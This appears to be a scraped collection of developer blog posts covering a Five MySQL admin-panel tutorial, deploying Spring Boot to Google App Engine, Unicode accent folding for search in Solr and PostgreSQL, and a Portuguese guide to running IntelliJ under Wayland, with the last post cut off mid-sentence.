Interface","link":"understanding-the-admin-panel-interface"},{"level":2,"content":"Conclusion: Create a MySQL Admin Panel","text":"Conclusion: Create a MySQL Admin Panel","link":"conclusion-create-a-mysql-admin-panel"}],"deleteHeaderList":[{"label":"How to Build a MySQL Admin Panel (4 Easy Steps)","value":"how-to-build-a-mysql-admin-panel-4-easy-steps","isDelete":false},{"label":"Building a MySQL Admin Panel using Five","value":"building-a-mysql-admin-panel-using-five","isDelete":false},{"label":"How Five Compares to Traditional Tech Stacks","value":"how-five-compares-to-traditional-tech-stacks","isDelete":false},{"label":"Advantages of Using Five Over Traditional Stacks","value":"advantages-of-using-five-over-traditional-stacks","isDelete":false},{"label":"Step by Step: How to Build a MySQL Admin Panel","value":"step-by-step-how-to-build-a-mysql-admin-panel","isDelete":false},{"label":"Step 1: Create a New Application with Five","value":"step-1-create-a-new-application-with-five","isDelete":false},{"label":"Step 2: Set Up a MySQL Database with Five","value":"step-2-set-up-a-mysql-database-with-five","isDelete":false},{"label":"Step 3: Develop Forms with Five","value":"step-3-develop-forms-with-five","isDelete":false},{"label":"Step 4: Launch the Application","value":"step-4-launch-the-application","isDelete":false},{"label":"Understanding the Admin Panel Interface","value":"understanding-the-admin-panel-interface","isDelete":false},{"label":"Conclusion: Create a MySQL Admin Panel","value":"conclusion-create-a-mysql-admin-panel","isDelete":false}],"isMigrated":true,"titleBg":"rgba(69,136,216,1)","titleColor":"rgba(255,255,255,1)","contentBg":"rgba(241,235,218,1)","contentColor":"rgba(0,21,36,1)","contentGap":8,"titleAlign":"center","titleFontSize":22,"titleFontWeight":"normal","titleLineHeightUnit":"px","contentFontWeight":"normal","contentLineHeight":1.4,"ttlP_isLinked":true,"commonStyles":{"desktop":".wp-admin .eb-parent-eb-toc-e787t { display:block }.wp-admin .eb-parent-eb-toc-e787t { filter:unset }.wp-admin .eb-parent-eb-toc-e787t::before { content:none }.eb-parent-eb-toc-e787t { display:block }.root-eb-toc-e787t { position:relative }","tab":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t::before { content:none }.eb-parent-eb-toc-e787t { display:block }","mobile":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t::before { content:none }.eb-parent-eb-toc-e787t { display:block }"}} /--> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Building a MySQL Admin Panel using Five</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five is an all-in-one development environment that simplifies the process of building, maintaining, and deploying custom web applications. Whether you're a startup or a large enterprise, Five offers a standardized, rapid approach to application development, making it an ideal choice for creating data-driven solutions.</p> <!-- /wp:paragraph --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">How Five Compares to Traditional Tech Stacks</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five integrates several technologies into one cohesive platform, providing everything needed for modern web application development. Applications built with Five use a MySQL database, are extensible through SQL, JavaScript, and TypeScript, and have an auto generated UI for the front end. Also they can be automatically deployed to the cloud taking the hassle out of completely self-managed hosting.</p> <!-- /wp:paragraph --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Advantages of Using Five Over Traditional Stacks</h3> <!-- /wp:heading --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Faster Development</strong>: Start building applications immediately without the time-consuming setup of traditional stacks.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Ease of Use</strong>: Access all necessary tools within Five, eliminating the need for multiple external tools and interfaces.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Flexibility</strong>: Extend applications with custom code and integrate popular technologies like webhooks and APIs.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Simplified Front-End and Back-End Development</strong>: Even developers without expertise in full-stack development can create and deploy applications easily.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:tadv/classic-paragraph --> <div style="background-color: #001524;"><hr style="height: 5px;"> <pre style="text-align: center; overflow: hidden; white-space: pre-line;"><span style="color: #f1ebda; background-color: #4588d8; font-size: calc(18px + 0.390625vw);"><strong>Create A MySQL Admin Panel</strong> <span style="font-size: 14pt;">Sign Up to Follow this Tutorial</span></span></pre> <p style="text-align: center;"><a href="https://five.co/get-started/" target="_blank" rel="noopener"><button style="background-color: #f8b92b; border: none; color: black; padding: 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 18px; cursor: pointer; margin: 4px 2px; border-radius: 5px;"><strong>Start For Free</strong></button><br></a></p> <hr style="height: 5px;"></div> <!-- /wp:tadv/classic-paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Step by Step: How to Build a MySQL Admin Panel</h2> <!-- /wp:heading --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 1: Create a New Application with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>To start, <a href="https://five.co/get-started/">sign up for Five’s free trial.</a> Follow these steps to create a new application:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Access Applications</strong>: Click on "Applications" in the top left corner.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Add New Application</strong>: Click the yellow Plus button.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Name Your Application</strong>: Enter a descriptive name in the Title field and save it by clicking the tick mark in the top right corner.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3225,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/image-31-1024x617-1.png" alt="" class="wp-image-3225"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>You’ll see your new application in the list. Click on the blue "Manage" button in the top right corner to access all of Five’s development features.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3226,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Manage-Your-Application-3-1024x576.png" alt="" class="wp-image-3226"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Don’t worry about customizing application settings initially. The default choices are sufficient to start creating your MySQL admin panel.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 2: Set Up a MySQL Database with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Next, create your MySQL database within Five. Five provides an integrated environment, eliminating the need for external MySQL GUIs.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Access Data Management</strong>: Click on "Manage," then "Data," and select "Table Wizard."</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3227,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Table-Wizard-1024x649-4.png" alt="" class="wp-image-3227"/></figure> <!-- /wp:image --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Create Database Tables</strong>: Use the Table Wizard to:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Create new tables from scratch.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Assign data and display types to fields.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Build relationships between tables using primary and foreign keys.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Import CSV files directly into your tables.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Add new fields to existing tables.</li> <!-- /wp:list-item --></ul> <!-- wp:image {"align":"center","id":3228,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Create-a-Table-with-the-Table-Wizard-1024x627-1.png" alt="" class="wp-image-3228"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>For a detailed tutorial on creating your first database table, refer to Five’s Quick Start Guide or watch this YouTube video.</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=jcRAhyw9rmI\u0026list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=jcRAhyw9rmI&amp;list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ </div></figure> <!-- /wp:embed --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Five automatically creates primary keys and foreign key fields when you establish a relationship between tables. The primary key field is named "TableNameKey" and stored as a GUID.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 3: Develop Forms with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>With your database tables set up, it’s time to create forms for user interaction.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Access Form Wizard</strong>: Click on "Visual," then "Form Wizard" in the menu.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3229,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-1024x650-7.png" alt="" class="wp-image-3229"/></figure> <!-- /wp:image --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Select Database Table</strong>: Choose the table your form will interact with. For example, if your table is named "Inventory," select it to generate corresponding fields.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3230,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-Creating-a-form-1024x656-3.png" alt="" class="wp-image-3230"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Five makes it easy to build a CRUD application with its seamless integration of the MySQL database. Watch this YouTube video for a step-by-step guide on creating forms.</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=C-P0vgwrU6s\u0026list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ\u0026index=2","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=C-P0vgwrU6s&amp;list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ&amp;index=2 </div></figure> <!-- /wp:embed --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Start with a simple form and explore customization options later. You can adjust field sizes, apply conditional logic, use custom display types, and assign events to user actions.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 4: Launch the Application</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>After setting up your database and forms, it’s time to launch your application.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Run Your Application</strong>: Click the "Run" button in the top-right corner to preview your application.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3231,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Run-Your-Application-5-1024x576.png" alt="" class="wp-image-3231"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Five automatically generates a clean and intuitive <a href="https://five.co/blog/the-admin-panel-the-best-web-app-template/">admin panel interface</a>. The user interface includes a navigation menu, in-app help, and a user avatar for multi-user applications. The main area allows users to interact with your forms, charts, dashboards, and other elements.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: If building locally, you can deploy the application only in your development environment. With a paid subscription, Five provides development, testing, and production environments for each application, simplifying release management.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Understanding the Admin Panel Interface</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five’s user interface is designed for data-driven, multi-user business applications. It includes components for displaying data, such as ratings, date pickers, and radio buttons. The interface is responsive, adjusting to various screen sizes from mobile phones to desktops.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Consider your end users' experience carefully. For mobile dashboards, keep the number of columns and rows minimal for better usability.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Conclusion: Create a MySQL Admin Panel</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>By following these steps, you can efficiently build a MySQL admin panel using Five. This platform offers a comprehensive development environment, allowing you to create, manage, and deploy applications with ease. Whether you are a startup or a large enterprise, Five provides the tools you need to develop powerful, data-driven solutions quickly.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>If you're serious about building with SQL, give Five a try. Sign up for free access to Five’s development environment and start building your next web application today.</p> <!-- /wp:paragraph -->
domfive
1,912,034
Deploy a Java application using Spring Boot on Google Cloud
Google Cloud offers many other features that you can configure, such as databases, storage,...
0
2024-07-04T23:15:33
https://dev.to/marioflores7/deploy-a-java-application-using-spring-boot-on-google-cloud-4mik
Google Cloud offers many other features that you can configure, such as databases, storage, monitoring, and more. Use Google App Engine, which is a serverless platform that makes it easy to deploy and automatically scale applications. Next, I'll show you how to do it. Step 1: Set up your environment 1. Install Google Cloud SDK: If you don't have it installed yet, follow the instructions here. 2. Initialize Google Cloud SDK: Set up your Google Cloud environment by running: **gcloud init** 3. Install the App Engine plugin: gcloud components install app-engine-java Step 2: Create a Spring Boot Application 1. Create a Spring Boot project: **o Project: Maven Project o Language: Java o Spring Boot: 2.5.x o Project Metadata: Enter the name of your group, artifact, and other details. o Dependencies: Add Spring Web.** Then, build the project and download the ZIP file. Unzip the file on your machine. 2. Create the Spring Boot application: Open your project in your favorite IDE 3. Create a simple controller: In the directory src/main/java/com/example/demo (adjust according to your structure), create a file called HelloController.java with the following content: package com.example.demo; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController; @RestController public class HelloController { @GetMapping("/") public String hello() { return "Hello, World!"; } } 4. Make sure the application runs: Run your application with the mvn spring-boot:run command and verify that you can access http://localhost:8080 and see the "Hello, World!" message Step 3: Prepare your app for App Engine 1. Create the app.yaml file: In the root directory of your project, create a file called app.yaml with the following content: **runtime: java11 instance_class: F1** This file tells App Engine to use the Java 11 runtime. 2. Package your application: Build your application to generate the executable JAR file. Use the Java 11 runtime environment. **mvn clean package** Step 4: Deploy the app to Google App Engine 1.Deploy the application: **gcloud app deploy target/demo-0.0.1-SNAPSHOT.jar** Follow the instructions and confirm the deployment when prompted. 2.Abrir la aplicación: **gcloud app browse** Tu aplicación Spring Boot ahora debería estar desplegada en Google App Engine. Puedes actualizar el código y redeployar usando el mismo comando gcloud app deploy.
marioflores7
1,910,973
Considerations for Unicode and Searching
In previous posts here and on Twitter (now X) I've written about using Unicode and UTF-8 in general...
0
2024-07-04T23:06:41
https://dev.to/mdchaney/considerations-for-unicode-and-searching-jo4
postgres, unicode
In previous posts here and on Twitter (now X) I've written about using Unicode and UTF-8 in general application development. In this article I'm going to expand a bit on how to handle searching when Unicode is present. To quickly summarize using Unicode in modern application development - it's probably something you won't even have to think about if you're using a modern high-level language. Strings are almost universally assumed to be in UTF-8 format, so everything just works. The biggest problem is when importing data from outside - there's still a ton of code out there that is writing using older 8-bit encodings (generally Latin-1/ISO-8859-1 in the western world) so it's best to check your data and force it to UTF-8 before processing. With that out of the way, let's consider "Beyoncé". Why? For purposes of this discussion simply because that name has a [Latin Small Letter E with Acute](https://www.compart.com/en/unicode/U+00E9) character - also known as "eacute" - in it. ```bash michael-chaneys-computer-2:~ mdchaney$ hexdump -C Beyoncé 00000000 42 65 79 6f 6e 63 c3 a9 0a |Beyonc...| ``` In this hex dump, "c3 a9" is the two-byte UTF-8 encoding for unicode character E9. In a text file, on this web site's database, etc. that will be stored as the two bytes that you see above. Here's the issue, though. If I'm searching for "Beyoncé" - how do I even get a funky accent thing above the "e"? I'll tell you how if you're on a Mac - press "option e", let them both up, then press the vowel over which you wish to place the acute symbol. In other words, option-e, then e. Beyoncé. So, that's it, right? Of course not. Let's say I have a music database (I really do have a bunch of them) and Beyoncé is in there. I want people to be able to search for her name and find her music. The problem? I'll tell you what the problem is - a bunch of Neanderthals using the internet that don't know that little Mac trick that I learned 2 minutes ago about typing an e-with-an-acute-mark from my keyboard. Okay, I'll confess. Even I would just type in "beyonce" if I was searching for her music. Not even a capital B, much less the funky acute mark over the e. Google has been so good for so long that we expect that search to just work because it always has at Google. So, how do we handle this when we write the search code? Well, what are we using for search? I want to spend the brunt of this article talking about how to do this in Postgres, partly because it's a little more difficult there. But let me start in [Apache Solr](https://solr.apache.org/), which is where I first worked on these issues. ## Apache Solr Configuration Solr is based on the [Lucene](https://lucene.apache.org/) library, as is [Elastic](https://www.elastic.co/). I mention this because these two search engines provide most private web site search capabilities on the internet. I started using Lucene around 25 years ago in Perl - it works well. In Apache Solr, there's a filter that can be added to the config for a search index called the "[ASCIIFoldingFilter](https://github.com/Orbiter/lucene-solr/blob/trunk/modules/analysis/common/src/java/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.java)". The code is a sight to behold, as it contains the logic for turning "Beyoncé" into "Beyonce". There's another case folder to further turn that into "beyonce". Go ahead and check out the source code linked above. I would direct your attention specifically to line 434 which matches "é", aka "latin small letter e with acute". If you scroll all the way to line 474 you'll find that the "é" along with 40 other friends gets mapped to a plain old "e". You've probably caught on even though I haven't explicitly stated it yet: for purposes of searching we have to get our text into the simplest form possible both for storage as well as for searching. After we munge both sets of data in the same way, we end up with this being stored: ``` beyonce ``` And any of these terms matching: ``` Beyoncé beyoncé Beyonce beyonce ``` Oddly enough, a bunch of things map to the plain old "e", so: ``` Beyoncǝ ``` also works. If you want to *really* get nuts, Imagine all the things that map to any of those letters. ``` ⓑǝẙǾɳꜾᶔ ``` If you run that string through the solr.ASCIIFoldingFilter, you'll get "beyonce" out the other side. I'm not saying that so that you can do it, although nobody's stopping you. The point is that there are many characters that map to any single ASCII character in this scenario. They will be stored in plain ASCII where possible. There are plenty of Unicode characters that *won't* be changed to anything else, by the way. Emojis are a common group of characters that'll go straight through. Chinese characters (regardless of what the multi-lingual genius at the tattoo parlor tells you) don't actually map to ASCII characters and vice versa. Same with Korean, Thai, Arabic, etc. In fact, the vast majority of Unicode characters are untouched by ASCIIFoldingFilter. But, for standard text from the Western World (The Americas and Europe) the characters will map down to the closest ASCII equivalent. Accents, umlauts, little circles - all those things get dropped for indexing. Apache Solr is a great search engine and I've used it extensively for well over a decade. It handles all of this text munging extremely well. But I also use PostgreSQL and it has a very robust full-text search engine built right in that might be good for your project, especially if you're already using it as your RDBMS data store. ## Configuring PostgreSQL For Search I love Postgres and use it just about everywhere. But the full-text search functionality requires a little bit of work to handle text in the manner that you want it to. Thankfully, their documentation is great, AI assistants such as ChatGPT and Claude seem to know everything about this subject, and Postgres itself comes with some awesome tools to make testing a breeze. Solr comes with various filters that you can use to munge your input text into the output text. Postgres has fewer available options, but the default setup is pretty good for English text. This includes a standard "stopword" dictionary to keep common words out of your index, implement case folding, and word stemming. Relevant to our discussion today, it also comes with the "unaccent" dictionary to handle fixing "Beyoncé", and "mañana", and whatever else you might come up with. But it's not included by default, so you'll have to do a little work. Let's first see how it handles all of this by default. Postgres includes the excellent "ts_debug" function which allows you to see exactly what it thinks about your text. ``` img3_dev=> select * from ts_debug('Beyoncé is coming mañana'); alias | description | token | dictionaries | dictionary | lexemes -----------+-------------------+---------+----------------+--------------+----------- word | Word, all letters | Beyoncé | {english_stem} | english_stem | {beyoncé} blank | Space symbols | | {} | | asciiword | Word, all ASCII | is | {english_stem} | english_stem | {} blank | Space symbols | | {} | | asciiword | Word, all ASCII | coming | {english_stem} | english_stem | {come} blank | Space symbols | | {} | | word | Word, all letters | mañana | {english_stem} | english_stem | {mañana} ``` This shows the default parser in action. "is" is a stop word, so it gets kicked out. "coming" is run through the default stemmer and is normalized as "come". But "Beyoncé" and "mañana" pass through unchanged save for being downcased. Now, one can make the case that letters like "é" and "ñ" don't occur in regular English so this is the proper functionality. I'm handling searches where names are a common element in the search, and accented characters are much more common in names. Even if we restrict ourselves to the United States where English is the most common language, clearly Spanish is the second most common and French is quite common as well. It's not just Beyoncé - Michael Bublé has an e-with-acute in his name as well. And many others. Just searching Google for "singers with accents in their names" brings up a litany of issues from programmers handling this situation. Look at this one, which also seems to be based on lack of Unicode normalization: https://www.discogs.com/forum/thread/826212 Here's someone talking about this problem in 2009: https://musicmachinery.com/2009/04/10/removing-accents-in-artist-names/ Anyway, the point is that even if you're handling straight English text, removing diacritics is important for name matching. And since the English language doesn't have diacritics, it won't really hurt to turn those letters into their straight ASCII equivalent since they won't exist outside of names or some non-English words. We have to create the "unaccent" extension in our database, create the new text search configuration, and finally modify it to add "unaccent" to the mix. ``` img3_dev=> CREATE EXTENSION IF NOT EXISTS unaccent; CREATE EXTENSION img3_dev=> CREATE TEXT SEARCH CONFIGURATION music_search ( COPY = english ); CREATE TEXT SEARCH CONFIGURATION img3_dev=> ALTER TEXT SEARCH CONFIGURATION music_search ALTER MAPPING FOR hword, hword_part, word WITH unaccent, english_stem; ALTER TEXT SEARCH CONFIGURATION img3_dev=> select * from ts_debug('music_search', 'Beyoncé is coming mañana'); alias | description | token | dictionaries | dictionary | lexemes -----------+-------------------+---------+-------------------------+--------------+----------- word | Word, all letters | Beyoncé | {unaccent,english_stem} | unaccent | {Beyonce} blank | Space symbols | | {} | | asciiword | Word, all ASCII | is | {english_stem} | english_stem | {} blank | Space symbols | | {} | | asciiword | Word, all ASCII | coming | {english_stem} | english_stem | {come} blank | Space symbols | | {} | | word | Word, all letters | mañana | {unaccent,english_stem} | unaccent | {manana} ``` Note that ts_debug isn't perfect. If you run this through `to_tsvector`, you get a slightly different result: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana'); to_tsvector -------------------------------- 'beyonc':1 'come':3 'manana':4 ``` Note that the stemming algorithm turns "beyonce" into "beyonc", and that's fine. The words will match. To show you how this works, consider the following queries where I use the standard built-in "english" search configuration: ``` img3_dev=> select to_tsvector('english', 'Beyoncé is coming mañana') @@ to_tsquery('english', 'beyoncé'); ?column? ---------- t (1 row) img3_dev=> select to_tsvector('english', 'Beyoncé is coming mañana') @@ to_tsquery('english', 'beyonce'); ?column? ---------- f (1 row) ``` If we search for "beyoncé", it's a match, but if we search for "beyonce" there's no match. Switching to our new "music_search" configuration: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'beyonce'); ?column? ---------- t (1 row) img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'beyoncé'); ?column? ---------- t (1 row) ``` There it is - works either way. I would also note that the "unaccent" dictionary in Postgres has fewer mappings than the ASCIIFoldingFactory in Solr. But, quite a few are still there: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'Ƃⅇẙỗɳcᶔ'); ?column? ---------- t (1 row) ``` If you want to see the dictionary, Postgres has these stored under your "share" directory, basically ".../share/postgresqlxx/tsearch_data", where "xx" is the version number. Depending on the installation, this will likely be under "/usr", but it might be under "/usr/local" or wherever Postgres is installed. You can view the "unaccent.rules" file to see the list. As an aside, if you want to gꝏf around (see what I did there?) with it and come up with weird ways to spell "Beyoncé" so it'll match, use "grep": ```bash michael-chaneys-computer-2:dl5 mdchaney$ grep 'o$' /opt/local/share/postgresql16/tsearch_data/unaccent.rules ò o ó o ô o õ o ö o ø o ō o ŏ o ő o ơ o ǒ o ǫ o ǭ o ȍ o ȏ o ȫ o ȭ o ȯ o ȱ o ṍ o ṏ o ṑ o ṓ o ọ o ỏ o ố o ồ o ổ o ỗ o ộ o ớ o ờ o ở o ỡ o ợ o ℅ c/o № No ℴ o ⱺ o ꜵ ao ꝋ o ꝍ o ꝏ oo o o ``` That shows you all the characters that will map to "o". Do that for all the letters, choose your favs, copy/paste, you get the idea. ## Outtro There's a lot to configuring a full-text search application on Postgres, but if you're going to search names this is pretty much required. And it's not difficult. Feel free to hit me up in comments here or on X (@MichaelDChaney) for any further ideas that you might need help with.
mdchaney
1,912,032
Como usar IntelliJ IDEA ou Android Studio no Wayland
Motivação Como eu uso bastante o IntelliJ IDEA e Android Studio no Fedora, eu estava um...
0
2024-07-04T22:57:42
https://dev.to/danroxha/como-usar-intellij-idea-ou-android-studio-no-wayland-27ga
wayland, linux, intellij, java
## Motivação Como eu uso bastante o IntelliJ IDEA e Android Studio no [Fedora](https://fedoraproject.org/), eu estava um pouco incomodado com a aparência borrada de ambas IDEs, pois adotei definitivamente o [_Wayland_](https://wayland.freedesktop.org/) como padrão. ## Considerações Atualmente o wayland com IntelliJ está em fase experimental (beta), então pode existir bugs visuais. - SO: - Fedora 40 - [GNOME Shell 46.2](https://www.gnome.org/) - IntelliJ - Versão flatpak - Java - jbr jcef 21.0.3 linux x64 b509.4 ## Obtendo Java compatível. Para usar o IntelliJ no Wayland no momento é preciso de uma versão de desenvolvimento do JDK a partir da v21. Para baixar uma versão de desenvolvimento siga para o link https://github.com/JetBrains/JetBrainsRuntime/releases. A versão que utilizarei nesse tutorial será a [jbr_jcef-21.0.3-linux-x64-b509.4.tar.gz](https://cache-redirector.jetbrains.com/intellij-jbr/jbr_jcef-21.0.3-linux-x64-b509.4.tar.gz) Descompacte o _tar.gz_ com qualquer ferramenta de sua preferência, e mova o diretorio para algum destino diferente da Download (Só pra evitar que limpe os _Downloads_ no futuro e acabe fazendo merda :smile:) O caminho que escolhi deixar a JDK no meu PC: <code>~/Programs/IntelliJ/jbr_jcef-21.0.3-linux-x64-b509.4/bin</code> ## Instalando o IntelliJ via Flatpak. Caso precise configurar o flatpak no seu computador siga as instruções em https://flathub.org/pt-BR/setup ### Loja O GNOME disponibiliza uma loja de aplicativos para instalação de apps. Pesquise por [IntelliJ IDEA](https://flathub.org/pt-BR/apps/com.jetbrains.IntelliJ-IDEA-Community) e faça a instalação (Next, Next, Next :smile:) 1. ![Icone loja GNOME](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nz15u2s1x77zi8q66xlb.png) 2. ![GNOME Software - Pesquisa por programa](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m2tzolrexsiwrw463ll0.png) ### Linha de comando Para instalação via CLI, abra o emulador de terminal e execute o comando abaixo. ```sh flatpak install flathub com.jetbrains.IntelliJ-IDEA-Community ``` ### Suporte Uma ferramente que será de grande ajuda nesse momento é o Flatseal ![Icone Flatseal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wq4tt832hwz30lpoqp5g.png) Faça o mesmo passo de instalação pela loja, procurando pelo [Flatseal](https://flathub.org/pt-BR/apps/com.github.tchx84.Flatseal) ou execute o comando abaixo no terminal. ```sh flatpak install flathub com.github.tchx84.Flatseal ``` ## Configurando o intelliJ Os passos seguintes podem ser replicados também para o [Android Studio](https://flathub.org/pt-BR/apps/com.google.AndroidStudio) instalado via Flatpak. - Abra o <code>Flatseal</code> e procure pelo IntelliJ IDEA ![Flatseal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83uproo2ws01ufdjkv4k.png) Role a página e procure a seção <code>Environment</code> - Defina o JAVA_HOME. ```sh JAVA_HOME=~/Programs/IntelliJ/jbr_jcef-21.0.3-linux-x64-b509.4/bin ``` ![Flatseal seção de Environment](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5spu6h0ehsxrvr18xpon.png) Observe que o Socket Wayland deve está habilitado ![Flatseal seção de sockets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xyywifg225enzy5d7bjn.png) - Configurando a VMOptions. Abra o IntelliJ e pressione o atalho <code>CTRL + SHIFT + A</code>. Em Actions procure por <code>VM Options</code>. Clique em <code>Edit Custom Options</code> ![Popup de comandos](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5x6v5b34718g9cg9zk2p.png) No arquivo idea64.vmoptions adicione a seguinte configuração ```init -Dawt.toolkit.name=WLToolkit ``` Como no exemplo abaixo. ![Configuração da VMOptions em arquivo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/108jp8hyu5svy45p708j.png) Feche e abra o IntelliJ, então verifique se há problemas com 